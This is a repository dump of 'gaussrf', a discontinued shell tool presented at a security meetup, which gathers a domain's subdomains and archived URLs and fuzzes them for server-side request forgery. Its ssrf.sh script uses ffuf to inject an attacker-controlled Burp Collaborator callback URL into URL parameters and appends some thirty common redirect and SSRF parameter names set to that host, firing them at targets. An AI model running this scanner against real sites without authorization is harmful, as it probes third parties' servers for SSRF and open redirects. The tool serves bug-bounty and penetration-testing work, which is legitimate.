Repository: KathanP19/gaussrf Branch: master Commit: efd399dec7bd Files: 4 Total size: 9.8 KB Directory structure: gitextract_310b9q4y/ ├── README.md ├── burp.txt ├── install.sh └── ssrf.sh ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ # gaussrf **It is now discontinued project, and not been maintained** ``` ____________________ __ ________________________________ __ ____/__ |_ / / / __ ___/_ ___/__ __ \__ ____/ _ / __ __ /| | / / / _____ \_____ \__ /_/ /_ /_ / /_/ / _ ___ / /_/ / ____/ /____/ /_ _, _/_ __/ \____/ /_/ |_\____/ /____/ /____/ /_/ |_| /_/ ``` Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl and Filter Urls With OpenRedirection or SSRF Parameters. This Tool was built to present in Null Ahmedabad [Deep Dive into SSRF](https://null.co.in/event_sessions/3086-deep-dive-into-ssrf) you can get slides from the link. ## Prerequisites * [GetAllUrls](https://github.com/lc/gau) - For Fetching Urls * [Assetfinder](https://github.com/tomnomnom/assetfinder) - For Subdomain Enumeration * [Drishti](https://github.com/devanshbatham/Drishti) - For check if url is live or not. You can now use install.sh to install require tools, this tools where made in go it should be installed in your system and dont forget to set path of go properly. ```bash $ sudo chmod +x install.sh $ ./install.sh ``` ### Installation ```bash $ git clone https://github.com/KathanP19/gaussrf.git $ cd gaussrf/ $ sudo chmod +x ssrf.sh ``` ### Usage Dont Forget to put your blind ssrf testing link or burp collab link in `burp.txt` or you can use thi site [SSRFTest](https://ssrftest.com/) if you dont have BurpPro ``` ____________________ __ ________________________________ __ ____/__ |_ / / / __ ___/_ ___/__ __ \__ ____/ _ / __ __ /| | / / / _____ \_____ \__ /_/ /_ /_ / /_/ / _ ___ / /_/ / ____/ /____/ /_ _, _/_ __/ \____/ /_/ |_\____/ /____/ /____/ /_/ |_| /_/ Usage: For Using directly where subdomains will be found using Assetfinder ./ssrf.sh -d domain.com ./ssrf.sh -d domain.com -o output_directory ./ssrf.sh -d domain.com -ap ./ssrf.sh -d domain.com -o output_directory -ap Usage: For Using list of Subdomains ./ssrf.sh -l subdomains.txt ./ssrf.sh -l subdomains.txt -o output_directory ./ssrf.sh -l subdomains.txt -ap ./ssrf.sh -l subdomains.txt -o output_directory -ap ``` ``` Options are as follows -d for direct letting assetfinder handle subdomain part -l for using list of subdomains -o for declaring output directory -ap for using parameter appending feature ``` ## Credits: Thanks @tomnomom for [Assetfinder](https://github.com/tomnomnom)! Thanks @devanshbatham for [Drishti](https://github.com/devanshbatham/Drishti)! Thanks @lc for [GAU](https://github.com/lc/gau)! Thanks @hussein98d for parameter appending feature. ### TODO list ~~Integrate [ffuf](https://github.com/ffuf/ffuf) to fuzz params with burp collab url.~~ ~~Add Option For User to Add there own subdoamin list.~~ ## Contributors [@iNoSec2](https://github.com/iNoSec2) for adding output option. ================================================ FILE: burp.txt ================================================ http://[yourburpcollaburl] ================================================ FILE: install.sh ================================================ #!/bin/bash echo "============================Installing Tools For GAUSSRF==========================" echo " " ##Install Assetfinder echo -e "\nINSTALLING \e[31m[assetfinder]\e[0m" go get -u github.com/tomnomnom/assetfinder echo -e "\nINSTALLING ASSETFINDER \e[32mFINISH\e[0m" ##Install GAU echo -e "\nINSTALLING \e[31m[GAU]\e[0m" go get -u github.com/lc/gau echo -e "\nINSTALLING GAU \e[32mFINISH\e[0m" ##Installing Drishti echo -e "\nINSTALLING \e[31m[Drishti]\e[0m" git clone https://github.com/devanshbatham/Drishti cd Drishti pip3 install -r requirements.txt rm raw_urls.txt cd .. echo -e "\nINSTALLING Drishti \e[32mFINISH\e[0m" ##Install qsreplace echo -e "\nINSTALLING \e[31m[QSreplace]\e[0m" go get -u github.com/tomnomnom/qsreplace echo -e "\nINSTALLING Qsreplace \e[32mFINISH\e[0m" ##Install ffuf echo -e "\nINSTALLING \e[31m[FFUF]\e[0m" go get github.com/ffuf/ffuf echo -e "\nINSTALLING FFUF \e[32mFINISH\e[0m" echo "=============================Done Installing Tools=================================" ================================================ FILE: ssrf.sh ================================================ #!/bin/bash red=`tput setaf 1` reset=`tput sgr0` logo(){ echo "${red} ____________________ __ ________________________________ __ ____/__ |_ / / / __ ___/_ ___/__ __ \__ ____/ _ / __ __ /| | / / / _____ \_____ \__ /_/ /_ /_ / /_/ / _ ___ / /_/ / ____/ /____/ /_ _, _/_ __/ \____/ /_/ |_\____/ /____/ /____/ /_/ |_| /_/ ${reset}" } subs(){ logo ##Getting SubDomains echo -e "\nRUNNING \e[31m[assetfinder]\e[0m" assetfinder --subs-only $domain > $output_directory/$domain/$domain.assetfinder.txt cat $output_directory/$domain/$domain.assetfinder.txt | sort -u > $output_directory/$domain/subs.txt echo "FOUND SUBDOMAINS [$(cat $output_directory/$domain/subs.txt | wc -l)]" echo -e "RUNNING ASSETFINDER \e[32mFINISH\e[0m" } list(){ logo echo "Its the list of subdomains" cp $param $output_directory/$domain/subs.txt } recon(){ ##Starting GETALLURLS echo -e "\nRUNNING \e[31m[GAU]\e[0m" cat $output_directory/$domain/subs.txt | gau > $output_directory/$domain/$domain.urls.txt echo -e "RUNNING GAU \e[32mFINISH\e[0m" echo "${red} ---------------COLLECTED URLS OF SUBDOMAINS--------------- ${reset}" ##Filter Urls to check with drishti echo -e "\n\e[31m[Filtering Urls with params]\e[0m" cat $output_directory/$domain/$domain.urls.txt | grep "=http" | tee $output_directory/$domain/$domain.urls_with_params.txt echo -e "Filtering Urls with params completed \e[32mFINISH\e[0m" ##Cleaning the list for urls echo -e "\nChecking for Live Urls \e[31m[LIST]\e[0m" cp $output_directory/$domain/$domain.urls_with_params.txt ./Drishti/ mv ./Drishti/$domain.urls_with_params.txt ./Drishti/raw_urls.txt cd ./Drishti python3 drishti.py cd .. cp ./Drishti/Results-200.txt $output_directory/$domain/ rm ./Drishti/raw_urls.txt echo "FOUND POSSIBLE SSRF URLS [$(cat $output_directory/$domain/Results-200.txt | wc -l)]" echo -e "Checking for Live Urls \e[32mFINISH\e[0m" ##FUZZ echo -e "\nHope You Have Added Burp Collab Url In burp.txt Fuzzing\e[31m[LIST]\e[0m" cat $output_directory/$domain/Results-200.txt | qsreplace FUZZ > $output_directory/$domain/fuzzable.txt ffuf -w "$output_directory/$domain/fuzzable.txt:URL" -w burp.txt -u URLFUZZ -v echo "${red} --------------DONE---------------- ${reset}" } param(){ echo -e "\n\e[31m[Making List of Appened SSRF Params And Fire Them]\e[0m" ser=`cat burp.txt` cat $output_directory/$domain/Results-200.txt | sort | uniq | grep "?" | qsreplace -a | qsreplace $ser > $output_directory/$domain/appended_params.txt sed -i "s|$|\&dest=$ser\&redirect=$ser\&uri=$ser\&path=$ser\&continue=$ser\&url=$ser\&window=$ser\&next=$ser\&data=$ser\&reference=$ser\&site=$ser\&html=$ser\&val=$ser\&validate=$ser\&domain=$ser\&callback=$ser\&return=$ser\&page=$ser\&feed=$ser\&host=$ser&\port=$ser\&to=$ser\&out=$ser\&view=$ser\&dir=$ser\&show=$ser\&navigation=$ser\&open=$ser|g" $output_directory/$domain/appended_params.txt echo -e "\nTOTAL NUMBER OF URLS APPENED WITH PARAMS [$(cat $output_directory/$domain/appended_params.txt | wc -l)]" echo "${red}-----------------------Check Your Server for Potential Callbacks------------------------- ${reset}" ffuf -w $output_directory/$domain/appended_params.txt -u FUZZ -t 50 echo "${red} --------------DONE---------------- ${reset}" } killit(){ logo echo "Usage: For Using directly which will find domains using Assetfinder" echo " ./ssrf.sh -d domain.com" echo " ./ssrf.sh -d domain.com -o output_directory" echo " ./ssrf.sh -d domain.com -ap" echo " ./ssrf.sh -d domain.com -o output_directory -ap" echo " " echo "Usage: For Using list of Subdomains" echo " ./ssrf.sh -l subdomains.txt" echo " ./ssrf.sh -l subdomains.txt -o output_directory" echo " ./ssrf.sh -l subdomains.txt -ap" echo " ./ssrf.sh -l subdomains.txt -o output_directory -ap" exit 1 } if [ -z "$1" ];then killit else while [ -n "$1" ]; do case "$1" in -d) domain="$2" if [[ $3 == '-o' && $5 == "-ap" ]];then output_directory="$4/gaussrf/recon/" mkdir -p "$output_directory"/"$domain" subs $domain recon $domain param $domain elif [[ $3 == "-o" ]] then output_directory="$4/gaussrf/recon/" mkdir -p "$output_directory"/"$domain" subs $domain recon $domain elif [[ $3 == "-ap" ]] then output_directory="recon" mkdir -p "$output_directory"/"$domain" subs $domain recon $domain param $domain else output_directory="recon" mkdir -p "$output_directory"/"$domain" subs $domain recon $domain fi shift break ;; -l) param="$2" echo -n "What's is your target name : " read domain if [[ $3 == '-o' && $5 == "-ap" ]];then output_directory="$4/gaussrf/recon/" mkdir -p "$output_directory"/"$domain" list recon $domain param $domain elif [[ $3 == "-o" ]] then output_directory="$4/gaussrf/recon/" mkdir -p "$output_directory"/"$domain" list recon $domain elif [[ $3 == "-ap" ]] then output_directory="recon" mkdir -p "$output_directory"/"$domain" list recon $domain param $domain else output_directory="recon" mkdir -p "$output_directory"/"$domain" list recon $domain fi shift break ;; *) echo "Option $1 not recongnized" ;; esac shift done fi